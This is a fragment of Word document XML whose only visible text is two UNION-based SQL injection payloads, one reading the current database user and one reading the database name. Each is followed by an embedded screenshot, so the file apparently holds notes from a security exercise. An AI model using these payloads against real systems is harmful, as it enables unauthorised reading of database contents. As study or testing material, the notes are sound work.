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00BF" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRPr="00CD692D" w:rsidRDefault="00CD692D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CD692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*' UNION (select CURRENT_USER(), 1, 2);-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB7AE0" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11512621" wp14:editId="71308106">
            <wp:extent cx="5943600" cy="354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B4E6" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D"/>
    <w:p w14:paraId="6EF9A701" w14:textId="77777777" w:rsidR="004F7C24" w:rsidRDefault="00CD692D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD2B67E" wp14:editId="6AAFEE97">
            <wp:extent cx="5943600" cy="2548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CE31" w14:textId="77777777" w:rsidR="00F373F8" w:rsidRDefault="00F373F8"/>
    <w:p w14:paraId="6D5B1F51" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D"/>
    <w:p w14:paraId="5BCD4775" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D"/>
    <w:p w14:paraId="6D3B3608" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D"/>
    <w:p w14:paraId="1394CBA4" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>*' UNION (select DATABASE(), 1, 2);-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E551A6F" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRPr="00CD692D" w:rsidRDefault="00CD692D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E3F595" w14:textId="77777777" w:rsidR="00CD692D" w:rsidRDefault="00CD692D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A610991" wp14:editId="77B90366">
            <wp:extent cx="5943600" cy="296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F8"/>
    <w:rsid w:val="00006A22"/>
    <w:rsid w:val="004F7C24"/>
    <w:rsid w:val="008C5F15"/>
    <w:rsid w:val="00CD692D"/>
    <w:rsid w:val="00CF5BF2"/>
    <w:rsid w:val="00E27DC6"/>
    <w:rsid w:val="00F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7752"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{96750495-FB0A-4516-BEED-4AB1696D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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-25T18:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-25T19:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>